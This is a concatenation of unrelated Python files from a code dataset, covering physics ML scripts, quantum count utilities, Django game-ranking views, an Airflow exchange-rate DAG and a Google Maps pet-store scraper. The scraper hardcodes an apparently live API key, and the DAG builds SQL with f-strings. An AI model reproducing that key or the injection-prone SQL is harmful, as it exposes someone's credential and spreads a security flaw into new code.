warnings.filterwarnings('error')\n try:\n fixed_gamma[0, :] = (1 + np.tan(g_angles) ** gamma_frontier_curvature) ** (-1 / gamma_frontier_curvature)\n fixed_gamma[1, :] = (1 - fixed_gamma[0, :] ** gamma_frontier_curvature) ** (1 / gamma_frontier_curvature)\n fixed_gamma = np.insert(fixed_gamma, 1,\n np.array([[1.0, 0.0]]), axis=1)\n fixed_gamma = np.insert(fixed_gamma, 6,\n np.array([[0.0, 1.0]]), axis=1)\n except Warning as e:\n print('Error in transform_fixed_gangles_to_gammas:', e)\n print(g_angles, gamma_frontier_curvature)\n raise\n return fixed_gamma\n\n\ndef add_skill_types(self, param_nparray):\n i = self.param_counter\n fixed_theta_mean = param_nparray[i:(i+cs.N_FIXED_DIM)]\n fixed_theta_sd = param_nparray[(i+cs.N_FIXED_DIM):(i+ 2 * cs.N_FIXED_DIM)]\n fixed_theta_corr = param_nparray[(i+ 2 * cs.N_FIXED_DIM)\n :(i+ 2 * cs.N_FIXED_DIM + int(cs.N_FIXED_DIM * (cs.N_FIXED_DIM - 1)/2))]\n self.thetatypes = get_fixed_skill_point_list(fixed_theta_mean, fixed_theta_sd, fixed_theta_corr)\n self.skill_types = list(fixed_theta_mean) + list(fixed_theta_sd) + list(fixed_theta_corr)\n self.param_counter += len(self.skill_types)\n\ndef get_fixed_skill_point_list(fixed_theta_mean, fixed_theta_sd, fixed_theta_corr):\n unrotated_skills = generate_unrotated_skill_points(fixed_theta_mean, fixed_theta_sd)\n thetatypes = rotate_skills(unrotated_skills, fixed_theta_corr)\n return thetatypes\n\n\ndef generate_unrotated_skill_points(fixed_theta_mean, fixed_theta_sd):\n\n numpts = int(np.sqrt(cs.N_INIT_PTS))\n # this will not generate the expected number of points unless\n # N_INIT_PTS is a perfect square\n\n quants = np.linspace(0, 1, numpts + 2)[1:-1]\n unrotated_skill0 = norm.ppf(quants, loc=fixed_theta_mean[0], scale=fixed_theta_sd[0])\n unrotated_skill1 = norm.ppf(quants, loc=fixed_theta_mean[1], scale=fixed_theta_sd[1])\n unrotated_skills = np.array([[t0, t1] for t0 in unrotated_skill0\n for t1 in unrotated_skill1])\n return unrotated_skills\n\n\ndef rotate_skills(thetatypes, correlation):\n rotated = thetatypes @ np.array([[1.0, correlation],\n [correlation, 1.0]])\n return rotated\n\n\ndef add_hc_accumulation_rates(self, param_ndarray):\n i = 
self.param_counter\n    self.mincer_rates = param_ndarray[i:(i + 2* cs.NJOBS)]\n    self.mincer_rates = np.reshape(self.mincer_rates, (cs.NJOBS, 2))\n    self.hc_accumulation_rates = list(self.mincer_rates.ravel())\n    self.param_counter += len(self.hc_accumulation_rates)\n","sub_path":"util/param_type.py","file_name":"param_type.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"375172172","text":"from typing import Union, List\nfrom .statistics import mean, sem\n\n\ndef separate_multi_counts(counts: dict) -> List[dict]:\n    \"\"\"Separate the distribution counts of multiple combined quantum circuits\n\n    Args:\n        counts (dictionary): counts distribution of result of multi-programming\n\n    Returns:\n        List[dictionary]: list of each counts distribution of quantum computation\n    \"\"\"\n    keys = list(counts.keys())\n    num_clbits = [len(clbit) for clbit in keys[0].split()]\n\n    # partial complete bitstrings\n    keys_each = [bitstrings(_clbits) for _clbits in num_clbits]\n\n    # separate counts\n    pointer = 0\n    separated_counts = []\n    for p_clbit_list, num_p_clbit in zip(keys_each, num_clbits):\n        p_counts = {}\n        for p_clbit in p_clbit_list:\n            p_counts[p_clbit] = 0\n            for bitstr, value in counts.items():\n                if bitstr[pointer : pointer + num_p_clbit] == p_clbit:\n                    p_counts[p_clbit] += value\n        separated_counts.append(p_counts)\n        pointer += num_p_clbit + 1\n\n    return separated_counts, num_clbits\n\n\ndef mean_counts_distribution(counts_list):\n    \"\"\"Take multiple distributions then return their mean\n\n    Args:\n        counts_list (List[dictionary]): list of counts distribution of result of quantum computation\n\n    Returns:\n        dictionary: counts distribution composed of the mean of each value in the counts distributions\n    \"\"\"\n    counts_mean = {}\n\n    _keys = list(counts_list[0].keys())\n    num_clbit = len(_keys[0])\n\n    bitstr_keys = bitstrings(num_clbit)\n    for bitstr in bitstr_keys:\n        values = []\n        for counts in counts_list:\n            try:\n                values.append(counts[bitstr])\n            except KeyError:\n                values.append(0)\n        counts_mean[bitstr] = mean(values)\n    return counts_mean\n\n\ndef sem_counts_distribution(counts_list):\n    \"\"\"Take multiple distributions then return a distribution composed of each standard error of the mean.\n\n    Args:\n        counts_list (List[dictionary]): list of counts distribution of result of quantum computation\n\n    Returns:\n        dictionary: counts distribution composed of the sem of each value in the counts distributions\n    \"\"\"\n    counts_sem = {}\n\n    _keys = list(counts_list[0].keys())\n    num_clbit = len(_keys[0])\n\n    bitstr_keys = bitstrings(num_clbit)\n    for bitstr in bitstr_keys:\n        values = []\n        for counts in counts_list:\n            try:\n                values.append(counts[bitstr])\n            except KeyError:\n                values.append(0)\n        counts_sem[bitstr] = sem(values)\n    return counts_sem\n\n\ndef bitstrings(num_clbits: Union[int, List[int]]):\n    \"\"\"Return ordered count keys.\"\"\"\n    if isinstance(num_clbits, int):\n        return [bin(j)[2:].zfill(num_clbits) for j in range(2 ** num_clbits)]\n\n    elif isinstance(num_clbits, list):\n        sum_clbits = int(sum(num_clbits))\n        _bitstrings = [bin(j)[2:].zfill(sum_clbits) for j in range(2 ** sum_clbits)]\n        spaced_bitstrings = []\n        for bits in _bitstrings:\n            counter = 0\n            spaced_bits = \"\"\n            bits = str(bits)\n            for idx, num_bits_in_reg in enumerate(num_clbits):\n                end = counter + num_bits_in_reg\n                reg_bits = bits[counter:end]\n                spaced_bits += reg_bits\n                if idx == len(num_clbits) - 1:\n                    break\n                spaced_bits += \" \"\n                counter = end\n            spaced_bitstrings.append(spaced_bits)\n        return 
spaced_bitstrings\n","sub_path":"utils/process_counts_distribution.py","file_name":"process_counts_distribution.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"30409539","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport numpy as np\nimport pandas as pd\n\nimport IPython\nimport tensorflow as tf\n\nfrom influence.logisticRegressionWithLBFGS import LogisticRegressionWithLBFGS\nfrom influence.binaryLogisticRegressionWithLBFGS import BinaryLogisticRegressionWithLBFGS\nimport influence.experiments as experiments\n\nfrom scripts.load_animals import load_animals\nfrom scripts.load_mnist import load_mnist\n\n\ndata_sets = load_animals(num_train_ex_per_class=300,\n num_test_ex_per_class=100,\n classes=['dog', 'fish'])\n# size: 299x299x3\n\n\n\n\nnum_classes = 2\n\ninput_dim = data_sets.train.x.shape[1]\nweight_decay = 0.01\nbatch_size = 1400\ninitial_learning_rate = 0.001\nkeep_probs = None\nmax_lbfgs_iter = 5000\ndecay_epochs = [1000, 10000]\nnum_to_remove = 50\nremove_type = 'neginf'\n\ntf.reset_default_graph()\n\n\ntf_model = BinaryLogisticRegressionWithLBFGS(\n input_dim=input_dim,\n weight_decay=weight_decay,\n max_lbfgs_iter=max_lbfgs_iter,\n num_classes=num_classes,\n batch_size=batch_size,\n data_sets=data_sets,\n initial_learning_rate=initial_learning_rate,\n keep_probs=keep_probs,\n decay_epochs=decay_epochs,\n mini_batch=False,\n train_dir='output',\n log_dir='log',\n model_name='mnist_logreg_lbfgs',\n num_to_remove=num_to_remove)\n\ntf_model.train()\n\ntest_idx = 8\nactual_loss_diffs, predicted_loss_diffs_cg, indices_to_remove = experiments.test_retraining(\n tf_model,\n test_idx=test_idx,\n iter_to_load=0,\n force_refresh=False,\n num_to_remove=num_to_remove,\n remove_type=remove_type,\n random_seed=0,\n approx_type='lissa',\n approx_params={'batch_size':1}\n)\n# #\n# experiments.viz_top_influential_examples(tf_model, [123], 20)\n# LiSSA\nnp.random.seed(17)\npredicted_loss_diffs_lissa = tf_model.get_influence_on_test_loss(\n [test_idx],\n indices_to_remove,\n approx_type='lissa',\n approx_params={'scale':25,\n 'recursion_depth':5000,\n 'damping':0,\n 'batch_size':1,\n 'num_samples':10},\n force_refresh=True\n)\n\nnp.savez(\n 'output/mnist_logreg_lbfgs_retraining-500.npz',\n actual_loss_diffs=actual_loss_diffs,\n predicted_loss_diffs_cg=predicted_loss_diffs_cg,\n predicted_loss_diffs_lissa=predicted_loss_diffs_lissa,\n indices_to_remove=indices_to_remove\n )","sub_path":"scripts/train_animal_logreg.py","file_name":"train_animal_logreg.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"551919546","text":"#!/usr/bin/env python\n\nimport sys\nimport time\n\nimport scrollphat\n\n\nscrollphat.set_brightness(2)\n\nif len(sys.argv) != 2:\n print(\"\\nusage: python simple-text-scroll.py \\\"message\\\" \\npress CTRL-C to exit\\n\")\n sys.exit(0)\n\nscrollphat.write_string(sys.argv[1], 11)\nlength = scrollphat.buffer_len()\n\nfor i in range(length):\n try:\n scrollphat.scroll()\n time.sleep(0.1)\n except KeyboardInterrupt:\n scrollphat.clear()\n sys.exit(-1)\n","sub_path":"examples/scroll-text-once.py","file_name":"scroll-text-once.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"652511239","text":"import sys\n\nimport os\n\nimport hashlib\n\n\ndef encoded_file(file):\n    code = \"\"\n    with open(file, 'r') as f:\n        data = f.read()\n        code = hashlib.md5(data.encode()).hexdigest()\n    return code\n\ndef get_size(file):\n    file_stats = os.stat(file)\n    return file_stats.st_size\n\n\n\ndef repchecker(dir_name):\n    list_of_files = []\n    hash_list = []\n    flag = 0\n    print(\"------------------------------------\")\n    for root, dirs, files in os.walk(\".\", topdown=True):\n        for name in files:\n            list_of_files.append(os.path.join(root, name))\n            hash_list.append(encoded_file(os.path.join(root, name)))\n\n    length = len(hash_list)\n    i = 0\n    while i < length:\n        flag = 0\n        j = i + 1\n        while j < length:\n            if hash_list[i] == hash_list[j]:\n                if get_size(list_of_files[i]) == get_size(list_of_files[j]):\n                    if flag == 0: \n                        print(list_of_files[i])\n                    print(list_of_files[j])\n                    list_of_files.pop(j)\n                    hash_list.pop(j)\n                    flag = 1\n                    length -= 1\n                    j -= 1 # prevents skipping an entry when the index shifts\n            j += 1\n        if flag == 1:\n            print(\"------------------------------------\")\n        i += 1\n\n\ndef main():\n    dir_name = sys.argv[1]\n    if os.path.isdir(dir_name):\n        if dir_name == \"./\":\n            path = os.getcwd()\n            path += '/'\n            repchecker(path)\n        else:\n            repchecker(dir_name + '/')\n    else:\n        print(\"That's not a directory!\")\n\n\nmain()\n","sub_path":"lista2/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"166194004","text":"import googlemaps\nimport pandas as pd\nimport time\n\ngmaps = googlemaps.Client(key='AIzaSyC7lSKqhxhVwRAWY-SMJCStIsh2mrbxKKc')\n\ncities=[\"Niagara Fall\"]\n\nids = []\nfor city in cities:\n\tresults = []\n\t# Geocoding an address\n\tgeocode_result = gmaps.geocode(city)\n\tloc = geocode_result[0]['geometry']['location']\n\tquery_result = gmaps.places_nearby(keyword=\"寵物\",location=loc, radius=10000)\n\tresults.extend(query_result['results'])\n\n\twhile query_result.get('next_page_token'):\n\t\ttime.sleep(2)\n\t\tquery_result = gmaps.places_nearby(page_token=query_result['next_page_token'])\n\t\tresults.extend(query_result['results']) \n\tprint(\"Number of pet stores within a 10000 m radius of \"+city+\" (the Google Maps API returns at most 60): \"+str(len(results)))\n\n\tfor place in results:\n\t\tids.append(place['place_id'])\n\n\nstores_info = []\n# remove duplicate ids\nids = list(set(ids)) \nfor id in ids:\n\tstores_info.append(gmaps.place(place_id=id, language='en')['result'])\n\noutput = pd.DataFrame.from_dict(stores_info)\nprint(output)\n\ndf = pd.DataFrame(output)\ndf.to_csv(\"test_data1.csv\")","sub_path":"Google API/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"330128116","text":"import json\nimport copy\n\nfrom django.views import View\nfrom django.http import (\n    JsonResponse,\n    HttpResponse\n)\n\nfrom .models import (\n    GameUser,\n    Comment,\n    Detail,\n    UserPageHit,\n    UserTrackInfo,\n    UserTrackRecord,\n    TeamType,\n    Ranking\n)\nfrom metadata.models import Track\nfrom user.utils import login_decorator\n\ndef milisec_converter(mili_sec):\n    minute = float(int(mili_sec)/60000)\n    second = str(round((float(format(minute, '.4f')) - (int(mili_sec)//60000)) * 60, 2)).replace('.','\\'')\n    lap_time = str(int(mili_sec)//60000) + '\\'' + second\n    return lap_time\n\n\nclass CommentView(View):\n    def get(self, request, user_id):\n        try:\n            if 
GameUser.objects.filter(access_id=user_id).exists():\n user = GameUser.objects.get(access_id=user_id)\n comments = Comment.objects.filter(to_id=user).values()\n\n return JsonResponse({'comment' : list(comments)}, status=200)\n\n return JsonResponse({'Message' : 'INVALID_USER'}, status=400)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\n @login_decorator\n def post(self, request, user_id):\n try:\n data = json.loads(request.body)\n from_user = request.userinfo.game_user\n to_user = GameUser.objects.get(access_id=user_id)\n\n Comment(\n comment = data['comment'],\n from_id = from_user,\n to_id = to_user\n ).save()\n\n return HttpResponse(status=200)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\nclass RankDetailView(View):\n def get(self, request, access_id):\n try:\n gameuser = GameUser.objects.get(access_id=access_id)\n if UserPageHit.objects.filter(game_user=gameuser).exists():\n countview = UserPageHit.objects.get(game_user=gameuser)\n countview.count += 1\n countview.save()\n else:\n UserPageHit.objects.create(\n count=1,\n game_user=gameuser\n )\n\n gameuser = GameUser.objects.select_related('userpagehit', 'detail').get(access_id=access_id)\n detail = gameuser.detail\n pageview = gameuser.userpagehit\n\n win_ratio = round(detail.win_cnt / detail.play_cnt, 2)\n\n rank_list_50 = eval(detail.rank_list_50)\n for index, i in enumerate(rank_list_50):\n if i == 99.0:\n rank_list_50[index] = 8.0\n\n return JsonResponse({\n 'character' : {\n 'id' : detail.character.id,\n 'name' : detail.character.name,\n 'key' : detail.character.key,\n 'img' : detail.character.url,\n 'nickname' : gameuser.nickname,\n },\n 'pageview' : pageview.count,\n 'win_ratio' : win_ratio,\n 'retire_ratio' : float(detail.retire_pct),\n 'rank_avg_500' : float(detail.rank_avg_500),\n 'rank_avg_50' : float(detail.rank_avg_50),\n 'rank_list_50' : rank_list_50\n }, status=200)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\n except GameUser.DoesNotExist:\n return HttpResponse(status=400)\n\nclass IndiDetailTrackView(View):\n def get(self, request, access_id):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '개인전')\n track_records = UserTrackRecord.objects.filter(\n game_user=access_id).all()\n track_infos = UserTrackInfo.objects.filter(\n game_user_id=access_id, team_type=match_type).all()\n records_exists = [i.track for i in track_records]\n info_exists_in_records = [i for i in track_infos if i.track in records_exists]\n track_info_result = [\n {\n 'play_cnt': i.play_cnt,\n 'win_ratio': float(i.win_ratio),\n 'best_lap': i.best_lap,\n 'track_name': i.track.name,\n 'track_key': Track.objects.get(name=i.track).key\n }\n for i in info_exists_in_records]\n return JsonResponse({\"information\": track_info_result}, status=200)\n\nclass TeamDetailTrackView(View):\n def get(self, request, access_id):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '팀전')\n track_records = UserTrackRecord.objects.filter(\n game_user=access_id).all()\n track_infos = UserTrackInfo.objects.filter(\n game_user_id=access_id, team_type=match_type).all()\n records_exists = [i.track for i in track_records]\n info_exists_in_records = [i for i in track_infos if i.track in records_exists]\n track_info_result = [\n {\n 'play_cnt': i.play_cnt,\n 'win_ratio': float(i.win_ratio),\n 'best_lap': i.best_lap,\n 'track_name': i.track.name,\n 
'track_key': Track.objects.get(name=i.track).key\n }\n for i in info_exists_in_records]\n return JsonResponse({\"information\": track_info_result}, status=200)\n\nclass IndiDetailTrackDist(View):\n def get(self, request, access_id, track_key):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '개인전')\n track = Track.objects.get(key = track_key)\n track_record = UserTrackRecord.objects.get(\n game_user = access_id, team_type = match_type, track = track)\n track_record2 = copy.deepcopy(track_record)\n track_record3 = {str(milisec_converter(i)):j for i,j in eval(track_record2.cumul_dist)[1].items()}\n track_record4 = [str(milisec_converter(eval(track_record2.cumul_dist)[0])), track_record3]\n track_record_result = [\n {\n 'track_distribution': eval(track_record.cumul_dist),\n 'track_distribution2' : track_record4,\n 'track_name': track_record.track.name,\n 'track_key': Track.objects.get(name=track_record.track.name).key\n }\n ]\n return JsonResponse({\"information\": track_record_result}, status=200)\n\nclass TeamDetailTrackDist(View):\n def get(self, request, access_id, track_key):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '팀전')\n track = Track.objects.get(key = track_key)\n track_record = UserTrackRecord.objects.get(\n game_user = access_id, team_type = match_type, track = track)\n track_record2 = copy.deepcopy(track_record)\n track_record3 = {str(milisec_converter(i)):j for i,j in eval(track_record2.cumul_dist)[1].items()}\n track_record4 = [str(milisec_converter(eval(track_record2.cumul_dist)[0])), track_record3]\n track_record_result = [\n {\n 'track_distribution': eval(track_record.cumul_dist),\n 'track_distribution2' : track_record4,\n 'track_name': track_record.track.name,\n 'track_key': Track.objects.get(name=track_record.track.name).key\n }\n ]\n return JsonResponse({\"information\": track_record_result}, status=200)\n\nclass IndiRankListView(View):\n def get(self, request):\n\n indi_match_id = \"7b9f0fd5377c38514dbb78ebe63ac6c3b81009d5a31dd569d1cff8f005aa881a\"\n team_id = 1\n\n rank_list = Ranking.objects.prefetch_related('game_user_set').filter(team_type_id=team_id).values()\n rank_list = list(rank_list)\n\n for i in range(len(rank_list)):\n rank_list[i]['nickname'] = GameUser.objects.get(id=i+1).nickname\n rank_list[i]['access_id'] = GameUser.objects.get(id=i+1).access_id\n rank_list[i]['matchType'] = indi_match_id\n\n return JsonResponse({\"indi_rank_list\" : rank_list}, status = 200)\n\nclass TeamRankListView(View):\n def get(self, request):\n\n team_match_id = \"effd66758144a29868663aa50e85d3d95c5bc0147d7fdb9802691c2087f3416e\"\n team_id = 2\n\n rank_list = Ranking.objects.prefetch_related('game_user_set').filter(team_type_id=team_id).values()\n rank_list = list(rank_list)\n\n for i in range(len(rank_list)):\n rank_list[i]['nickname'] = GameUser.objects.get(id=i+1).nickname\n rank_list[i]['access_id'] = GameUser.objects.get(id=i+1).access_id\n rank_list[i]['matchType'] = team_match_id\n\n return JsonResponse({\"team_rank_list\" : rank_list}, status = 200)\n","sub_path":"rank/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"571203943","text":"# 导入模块\nimport xlwings as xw\n\n# 1 新增工作表\ndef add_sheet():\n app = xw.App(visible=True, add_book=False)\n # 2 打开原工作簿\n workbook = app.books.open(\"../source_material/01/合并工作表.xlsx\")\n # 3 新增工作表\n 
    workbook.sheets.add(\"合并工作表\")\n\n    return workbook\n\n# 2 Get the last-cell position info from each sheet\ndef get_sheet_value(workbook):\n    # Get all worksheets\n    listsht = workbook.sheets\n    # Create an empty list to hold each sheet's last position info\n    list_address = []\n    for sheet in listsht:\n        if sheet.name != \"合并工作表\":\n            address_all = sheet.used_range.address.split(\"$\")[-1]\n            list_address.append(int(address_all))\n\n    return list_address\n\n# 3 Put the values into the merged sheet according to their positions\ndef set_merge_sheet(workbook, address):\n    # Write the first row of data first\n    workbook.sheets[\"合并工作表\"].range(\"A1:E1\").value = workbook.sheets[1].range(\"A1:E1\").value\n\n\n# 4 Python program entry point\nif __name__ == \"__main__\":\n    # 1 Add a new worksheet\n    obj_workbook = add_sheet()\n    # 2 Get the last-cell position info from each sheet\n    list_address = get_sheet_value(obj_workbook)\n    # 3 Put the values into the merged sheet according to their positions\n    set_merge_sheet(obj_workbook, list_address)\n\n\n\n","sub_path":"Python_Office_Automation/04-实战应用案例分析/01-应用案例:合并工作表/05-设置合并工作表的第一行数据.py","file_name":"05-设置合并工作表的第一行数据.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"158197797","text":"from datetime import datetime, timedelta\nimport os\nimport requests\nimport logging\n\nfrom airflow import DAG\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.hooks.base_hook import BaseHook\nfrom airflow.models import Variable\n\nimport pandas as pd\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.base import Engine\n\nfrom shared import make_engine\n\nlogger = logging.getLogger('airflow.task')\nlogger.info('Exchange Rates information...')\n\ndefault_args = {\n    'owner': 'airflow',\n    'start_date': datetime(2021, 10, 14),\n    'retries': 1,\n    'retry_delay': timedelta(minutes=5),\n    'depends_on_past': False,\n    'email_on_failure': True,\n    'email_on_retry': False,\n    'email': 'vincent.farah@madetech.com'\n}\nex_rates_data_path = f'{Variable.get(\"data_path\")}/exchange-rates.csv'\ntransformed_ex_rates_path = f'{os.path.splitext(ex_rates_data_path)[0]}-transformed.csv'\n\ndef transform_ex_rates_data(*args, **kwargs):\n    ex_rates_data = pd.read_csv(filepath_or_buffer=ex_rates_data_path,\n                    sep=',',\n                    header=0,\n                    usecols=['code','rate','base_rate_code','date'],\n                    parse_dates=['date'],\n                    index_col=0\n                    )\n    ex_rates_data.to_csv(path_or_buf=transformed_ex_rates_path)\n\ndef load_csv_ex_rates_to_db(*args, **kwargs): \n    transformed_ex_rates = pd.read_csv(transformed_ex_rates_path)\n    transformed_ex_rates.dropna(axis=0, how='any', inplace=True)\n    engine = make_engine()\n    transformed_ex_rates.to_sql('ex_rates',engine,if_exists='replace',chunksize=500,index=False)\n\ndef get_ex_rates_from_api():\n    url = Variable.get('exchange_url')\n    logger.info(f'Loading data from {url}')\n    response = requests.get(url)\n    logger.info(response)\n    json_response = response.json() \n    logger.info(json_response)\n    return json_response\n\ndef store_latest_ex_rates_from_api_to_db():\n    rates_data = get_ex_rates_from_api()\n    date = rates_data['date']\n    logger.info('Date %s', date)\n    base_rate_code = rates_data['base']\n    logger.info('Base Code %s', base_rate_code)\n    rates = rates_data['rates']\n    logger.info(rates)\n    engine = make_engine() \n    delete_rates_by_date(date, engine)\n    add_exchange_rates(date, base_rate_code, rates, engine)\n\ndef add_exchange_rates(date, base_rate_code, rates, engine):\n    if rates:\n        usd_base_rate = rates['USD']\n        gbp_base_rate = rates['GBP']\n        for code, rate in rates.items(): \n            add_exchange_rate(date, base_rate_code, engine, code, rate)\n            if usd_base_rate:\n
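                # cross-rate conversion: dividing by the base-currency rate re-bases the quote;\n                # e.g. with an EUR base, rates['USD']=1.10 and rates['JPY']=130.0 give 130.0/1.10 ≈ 118.2 JPY per USD\n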
                add_exchange_rate(date, 'USD', engine, code, rate/usd_base_rate)\n            if gbp_base_rate:\n                add_exchange_rate(date, 'GBP', engine, code, rate/gbp_base_rate)\n\ndef add_exchange_rate(date, base_rate_code, engine, code, rate):\n    logger.info(f'{code}, {rate}, {base_rate_code}, {date}') \n    # TODO: Refactor using the ORM \n    insert_response = engine.execute(\n        f'''\n        INSERT INTO ex_rates(code,rate,base_rate_code,date) \n        VALUES ('{code}',{rate},'{base_rate_code}','{date}');\n        '''\n    )\n    logger.info(f'Created \"{insert_response.rowcount}\" records')\n\ndef delete_rates_by_date(date, engine):\n    if date:\n        # TODO: Refactor using the ORM\n        delete_response = engine.execute(f\"DELETE FROM ex_rates WHERE date = '{date}'\")\n        logger.info(f'Deleted \"{delete_response}\" records')\n    \nwith DAG(dag_id='exchange_rates_dag',\n         schedule_interval='@daily',\n         default_args=default_args,\n         template_searchpath=[f\"{os.environ['AIRFLOW_HOME']}\"],\n         catchup=False) as dag:\n    \n    # TODO: Refactor using ORM\n    create_table_ex_rates_if_not_exists = PostgresOperator(\n        task_id='create_table_ex_rates_if_not_exists',\n        sql='''CREATE TABLE IF NOT EXISTS ex_rates (\n            code VARCHAR(3) NOT NULL,\n            rate DECIMAL NOT NULL,\n            base_rate_code VARCHAR(3) NOT NULL,\n            date DATE NOT NULL,\n            CONSTRAINT pk_ex_rates PRIMARY KEY (code, base_rate_code, date)\n            );''',\n        postgres_conn_id='postgres',\n        database='exercise1'\n    )\n\n    transform_ex_rates_data = PythonOperator(\n        task_id='transform_ex_rates_data',\n        python_callable=transform_ex_rates_data\n    )\n\n    save_csv_ex_rates_to_db = PythonOperator(\n        task_id='save_csv_ex_rates_to_db',\n        python_callable=load_csv_ex_rates_to_db\n    )\n\n    save_latest_ex_rates_from_api_to_db = PythonOperator(\n        task_id='save_latest_ex_rates_from_api_to_db',\n        python_callable=store_latest_ex_rates_from_api_to_db\n    )\n\n    transform_ex_rates_data >> create_table_ex_rates_if_not_exists >> save_csv_ex_rates_to_db\n    create_table_ex_rates_if_not_exists >> save_latest_ex_rates_from_api_to_db\n","sub_path":"Exercise1/dags/exchange_rates_dag.py","file_name":"exchange_rates_dag.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"13783880","text":"#!/usr/local/bin/python\n# encoding:utf-8\n# =====================================================\n# this part is set in the PyCharm template\n# created by Chen Xu\n# email: chenxu@mail.ustc.edu.cn\n# copyright cx\n# Darwin Kernel Version 16.5.0: Fri Mar 3 16:52:33 PST 2017; root:xnu-3789.51.2~3/RELEASE_X86_64\n# =====================================================\n# same as p22_mlp but without the l2 loss\n\nfrom keras.models import Sequential, load_model\nfrom keras import optimizers, losses, metrics\nfrom keras.layers import Dense, Dropout\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import TensorBoard\nfrom keras.utils import plot_model, to_categorical\n\nnp.set_printoptions(precision=4)\nnpTypeUsed = np.float32\ninDataAll = np.load('mlpHiggs2.d.npy')\nused_structure = ['ptsumf', 'msumf', 'acolin', 'minvis']\nx_d = inDataAll[used_structure].tolist()\nx_d_test = np.asarray(x_d[::2], dtype=npTypeUsed)\nx_d_train = np.asarray(x_d[1::2], dtype=npTypeUsed)\n\ny_d = inDataAll[['type']].tolist()\ny_d_test = np.asarray(y_d[::2], dtype=npTypeUsed)\ny_d_train = np.asarray(y_d[1::2], dtype=npTypeUsed)\ny_d_test = to_categorical(y_d_test, num_classes=2)\ny_d_train = to_categorical(y_d_train, num_classes=2)\n\nn_o: int = 2\nn_i: int = len(used_structure) # input\nn_h: list = 
[n_i, 5, 3, n_o]\ni_l_out: int = len(n_h) - 1\nkeepProb: float = 1.0\n\nmodelfile: str = 'sav/keras.d.h5'\nif os.path.isfile(modelfile):\n print('load exit model', modelfile)\n model = load_model(modelfile)\nelse:\n print('new training')\n model = Sequential()\n model.add(Dense(n_h[1], activation='relu', input_shape=(n_i,)))\n# model.add(Dropout(rate=(1.0-keepProb)))\n for i in range(i_l_out-2):\n model.add(Dense(n_h[i+2], activation='relu'))\n# model.add(Dropout(rate=(1.0-keepProb)))\n model.add(Dense(n_o, activation='softmax', use_bias=True))\n adamOp = optimizers.Adam(lr=0.001)\n model.compile(loss=losses.categorical_crossentropy, optimizer=adamOp,\n # metrics=[metrics.categorical_accuracy, metrics.categorical_crossentropy])\n metrics=[metrics.categorical_accuracy])\n\ntensorboard = TensorBoard(log_dir='./log', batch_size=2000, histogram_freq=1, write_graph=True)\nhistory = model.fit(x_d_train, y_d_train, batch_size=2000, epochs=30, verbose=1,\n validation_data=(x_d_test, y_d_test), callbacks=[tensorboard])\n\nmodel.save(modelfile)\n# model.summary()\nplot_model(model, to_file='model.png', show_shapes=True)\n\nouttype = [('y_p0', npTypeUsed), ('y_p1', npTypeUsed), ('y0', npTypeUsed), ('y1', npTypeUsed)]\ny_p = model.predict(x_d_train)\noutall = (np.concatenate((y_p, y_d_train.astype(npTypeUsed)), axis=1)).view(dtype=outtype)\nnp.save(\"mlpout.d\", outall)\ny_p = model.predict(x_d_test)\noutall2 = (np.concatenate((y_p, y_d_test.astype(npTypeUsed)), axis=1)).view(dtype=outtype)\n\n\nplt.figure(1)\nplt1 = plt.subplot(221)\nplt1.set_yscale(\"log\")\nplt1.hist((outall[outall['y0'] < 0.1]['y_p0'], outall[outall['y0'] > 0.9]['y_p0']), bins=30, range=[-0.1, 1.1])\nplt2 = plt.subplot(222)\nplt2.set_yscale(\"log\")\nplt2.hist((outall[outall['y1'] < 0.1]['y_p1'], outall[outall['y1'] > 0.9]['y_p1']), bins=30, range=[-0.1, 1.1])\nplt3 = plt.subplot(223)\nplt3.set_yscale(\"log\")\nplt3.hist((outall2[outall2['y0'] < 0.1]['y_p0'], outall2[outall2['y0'] > 0.9]['y_p0']), bins=30, range=[-0.1, 1.1])\nplt4 = plt.subplot(224)\nplt4.set_yscale(\"log\")\nplt4.hist((outall2[outall2['y1'] < 0.1]['y_p1'], outall2[outall2['y1'] > 0.9]['y_p1']), bins=30, range=[-0.1, 1.1])\nplt.show()\n","sub_path":"p22_mlp.py","file_name":"p22_mlp.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 